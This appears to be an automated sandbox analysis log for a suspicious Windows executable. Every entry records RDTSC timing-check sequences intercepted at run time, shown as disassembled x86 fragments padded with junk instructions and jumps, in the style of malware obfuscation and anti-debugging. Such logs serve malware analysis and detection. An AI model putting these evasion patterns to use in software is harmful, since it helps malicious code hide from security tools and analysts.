Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 15A785A second address: 15A786E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8C6D17D0A6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jng 00007F8C6D17D0ACh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 15A786E second address: 15A7877 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 15AF642 second address: 15AF66F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6D17D0ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F8C6D17D0B6h 0x0000000f pop eax 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 15AF66F second address: 15AF674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 15B533E second address: 15B5361 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8C6D17D0A8h 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007F8C6D17D0B2h 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 15C36B8 second address: 15C36BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 15C3535 second address: 15C3547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F8C6D17D0A6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 15C3547 second address: 15C354B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990EA9 second address: 7990EB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C6CC6478Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990EB9 second address: 7990F27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-18h] 0x0000000b jmp 00007F8C6D17D0B7h 0x00000010 nop 0x00000011 jmp 00007F8C6D17D0B6h 0x00000016 push eax 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F8C6D17D0B1h 0x0000001e add si, E406h 0x00000023 jmp 00007F8C6D17D0B1h 0x00000028 popfd 0x00000029 mov ebx, eax 0x0000002b popad 0x0000002c nop 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990F27 second address: 7990F2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990F2B second address: 7990F31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990F31 second address: 7990F37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990F87 second address: 7990F99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C6D17D0AEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990F99 second address: 7990F9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7990F9D second address: 799107D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F8CDB11B7B0h 0x0000000e jmp 00007F8C6D17D0B7h 0x00000013 mov eax, dword ptr [ebp-14h] 0x00000016 jmp 00007F8C6D17D0B6h 0x0000001b mov ecx, esi 0x0000001d pushad 0x0000001e movzx esi, dx 0x00000021 mov al, dh 0x00000023 popad 0x00000024 mov dword ptr [esi+0Ch], eax 0x00000027 pushad 0x00000028 pushad 0x00000029 movzx eax, bx 0x0000002c pushfd 0x0000002d jmp 00007F8C6D17D0B3h 0x00000032 add eax, 655E0ACEh 0x00000038 jmp 00007F8C6D17D0B9h 0x0000003d popfd 0x0000003e popad 0x0000003f pushfd 0x00000040 jmp 00007F8C6D17D0B0h 0x00000045 adc ecx, 3789B348h 0x0000004b jmp 00007F8C6D17D0ABh 0x00000050 popfd 0x00000051 popad 0x00000052 mov edx, 759B06ECh 0x00000057 jmp 00007F8C6D17D0B6h 0x0000005c sub eax, eax 0x0000005e jmp 00007F8C6D17D0B1h 0x00000063 lock cmpxchg dword ptr [edx], ecx 0x00000067 push eax 0x00000068 push edx 0x00000069 push eax 0x0000006a push edx 0x0000006b pushad 0x0000006c popad 0x0000006d rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 799107D second address: 7991081 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7991081 second address: 7991087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7991087 second address: 79910AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6CC64792h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8C6CC6478Ah 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79910AC second address: 79910B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79910B0 second address: 79910B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79910B6 second address: 79910BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79910BC second address: 79910C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79910C0 second address: 79910C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79910C4 second address: 79910D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test eax, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79910D4 second address: 79910E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6D17D0ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79910E5 second address: 7991105 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6CC64791h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F8CDAC02D68h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7991105 second address: 799110D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, dx 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 799110D second address: 7991147 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, CFh 0x00000005 mov cx, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edx, dword ptr [ebp+08h] 0x0000000e pushad 0x0000000f movsx ebx, cx 0x00000012 mov ecx, 54F445EDh 0x00000017 popad 0x00000018 mov eax, dword ptr [esi] 0x0000001a jmp 00007F8C6CC64798h 0x0000001f mov dword ptr [edx], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7991147 second address: 7991164 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6D17D0B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7991164 second address: 7991181 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6CC64791h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+04h] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7991181 second address: 79911A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6D17D0B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dh, cl 0x0000000b popad 0x0000000c mov dword ptr [edx+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push edx 0x00000013 pop esi 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79911A9 second address: 79911AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79911AF second address: 79911B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79911B3 second address: 79911B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79911B7 second address: 79911F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+08h] 0x0000000b pushad 0x0000000c push eax 0x0000000d mov ebx, 01BDFFB4h 0x00000012 pop edi 0x00000013 push ecx 0x00000014 mov bx, 914Ch 0x00000018 pop ebx 0x00000019 popad 0x0000001a mov dword ptr [edx+08h], eax 0x0000001d pushad 0x0000001e mov bh, al 0x00000020 mov ebx, 2D3A4B4Eh 0x00000025 popad 0x00000026 mov eax, dword ptr [esi+0Ch] 0x00000029 pushad 0x0000002a mov dx, 7626h 0x0000002e mov edi, 707DCEB2h 0x00000033 popad 0x00000034 mov dword ptr [edx+0Ch], eax 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79911F4 second address: 79911F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79911F8 second address: 79911FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79911FE second address: 799121A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C6CC64798h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 799121A second address: 799121E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 799121E second address: 799122F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+10h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 799122F second address: 7991233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7991233 second address: 799124B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6CC64794h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 799124B second address: 799125D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C6D17D0AEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 799125D second address: 7991298 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6CC6478Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+10h], eax 0x0000000e pushad 0x0000000f mov si, F21Bh 0x00000013 jmp 00007F8C6CC64790h 0x00000018 popad 0x00000019 mov eax, dword ptr [esi+14h] 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F8C6CC6478Ah 0x00000025 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7991298 second address: 79912A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6D17D0ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79912A7 second address: 79912AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79912AD second address: 7991303 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+14h], eax 0x0000000b jmp 00007F8C6D17D0B7h 0x00000010 mov eax, dword ptr [esi+18h] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F8C6D17D0ABh 0x0000001c xor cx, F43Eh 0x00000021 jmp 00007F8C6D17D0B9h 0x00000026 popfd 0x00000027 mov edx, esi 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7991303 second address: 7991309 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7991309 second address: 799130D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 799130D second address: 799132C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+18h], eax 0x0000000b jmp 00007F8C6CC6478Bh 0x00000010 mov eax, dword ptr [esi+1Ch] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 799132C second address: 7991330 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7991330 second address: 7991334 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7991334 second address: 799133A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 799133A second address: 7991350 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+1Ch], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov edi, 5FC3ADB0h 0x00000013 mov eax, ebx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7991350 second address: 79913CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6D17D0B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+20h] 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f pop ebx 0x00000010 mov ebx, ecx 0x00000012 popad 0x00000013 mov si, 674Bh 0x00000017 popad 0x00000018 mov dword ptr [edx+20h], eax 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F8C6D17D0ACh 0x00000022 jmp 00007F8C6D17D0B5h 0x00000027 popfd 0x00000028 movzx ecx, di 0x0000002b popad 0x0000002c mov eax, dword ptr [esi+24h] 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 mov dx, ax 0x00000035 pushfd 0x00000036 jmp 00007F8C6D17D0B0h 0x0000003b and eax, 19FB19E8h 0x00000041 jmp 00007F8C6D17D0ABh 0x00000046 popfd 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79913CD second address: 79913D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79913D3 second address: 79913D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79913D7 second address: 7991423 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+24h], eax 0x0000000b jmp 00007F8C6CC64797h 0x00000010 mov eax, dword ptr [esi+28h] 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushfd 0x00000017 jmp 00007F8C6CC64792h 0x0000001c xor cx, EEA8h 0x00000021 jmp 00007F8C6CC6478Bh 0x00000026 popfd 0x00000027 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7991423 second address: 7991447 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8C6D17D0B4h 0x0000000b popad 0x0000000c mov dword ptr [edx+28h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7991447 second address: 7991464 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6CC64799h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7991464 second address: 79914E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, bh 0x00000005 call 00007F8C6D17D0B8h 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ecx, dword ptr [esi+2Ch] 0x00000011 pushad 0x00000012 mov dx, 0412h 0x00000016 pushfd 0x00000017 jmp 00007F8C6D17D0B3h 0x0000001c and eax, 04534C0Eh 0x00000022 jmp 00007F8C6D17D0B9h 0x00000027 popfd 0x00000028 popad 0x00000029 mov dword ptr [edx+2Ch], ecx 0x0000002c jmp 00007F8C6D17D0AEh 0x00000031 mov ax, word ptr [esi+30h] 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F8C6D17D0AAh 0x0000003e rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79914E5 second address: 79914F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6CC6478Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79914F4 second address: 79915BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6D17D0B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [edx+30h], ax 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F8C6D17D0ACh 0x00000014 and ch, 00000048h 0x00000017 jmp 00007F8C6D17D0ABh 0x0000001c popfd 0x0000001d mov bx, cx 0x00000020 popad 0x00000021 mov ax, word ptr [esi+32h] 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F8C6D17D0B0h 0x0000002c sub al, FFFFFFA8h 0x0000002f jmp 00007F8C6D17D0ABh 0x00000034 popfd 0x00000035 push eax 0x00000036 pushfd 0x00000037 jmp 00007F8C6D17D0AFh 0x0000003c add cx, 3EEEh 0x00000041 jmp 00007F8C6D17D0B9h 0x00000046 popfd 0x00000047 pop eax 0x00000048 popad 0x00000049 mov word ptr [edx+32h], ax 0x0000004d pushad 0x0000004e pushad 0x0000004f pushad 0x00000050 popad 0x00000051 jmp 00007F8C6D17D0B9h 0x00000056 popad 0x00000057 mov bx, cx 0x0000005a popad 0x0000005b mov eax, dword ptr [esi+34h] 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79915BC second address: 79915C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79915C0 second address: 79915CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6D17D0ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79915CF second address: 799160C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6CC64799h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+34h], eax 0x0000000c jmp 00007F8C6CC6478Eh 0x00000011 test ecx, 00000700h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov edx, 19507070h 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 799160C second address: 7991631 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C6D17D0B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F8CDB11B19Bh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov edi, 729CE6D0h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7991631 second address: 799172C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8C6CC6478Bh 0x00000009 and si, 5A7Eh 0x0000000e jmp 00007F8C6CC64799h 0x00000013 popfd 0x00000014 movzx esi, dx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a or dword ptr [edx+38h], FFFFFFFFh 0x0000001e jmp 00007F8C6CC64793h 0x00000023 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F8C6CC64794h 0x0000002e sub ecx, 113877D8h 0x00000034 jmp 00007F8C6CC6478Bh 0x00000039 popfd 0x0000003a mov ecx, 04F54E8Fh 0x0000003f popad 0x00000040 or dword ptr [edx+40h], FFFFFFFFh 0x00000044 jmp 00007F8C6CC64792h 0x00000049 pop esi 0x0000004a pushad 0x0000004b call 00007F8C6CC6478Eh 0x00000050 pushfd 0x00000051 jmp 00007F8C6CC64792h 0x00000056 or eax, 6395BC98h 0x0000005c jmp 00007F8C6CC6478Bh 0x00000061 popfd 0x00000062 pop eax 0x00000063 push eax 0x00000064 push edx 0x00000065 pushfd 0x00000066 jmp 00007F8C6CC6478Fh 0x0000006b adc esi, 0F95255Eh 0x00000071 jmp 00007F8C6CC64799h 0x00000076 popfd 0x00000077 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 79E0CB2 second address: 79E0CFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F8C6D17D0B7h 0x00000008 pop esi 0x00000009 call 00007F8C6D17D0B9h 0x0000000e pop eax 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F8C6D17D0ADh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7920013 second address: 7920019 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7920C4D second address: 7920C5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8C6D17D0ACh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8kl5nJ3f9x.exe RDTSC instruction interceptor: First address: 7920C5D second address: 7920C61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
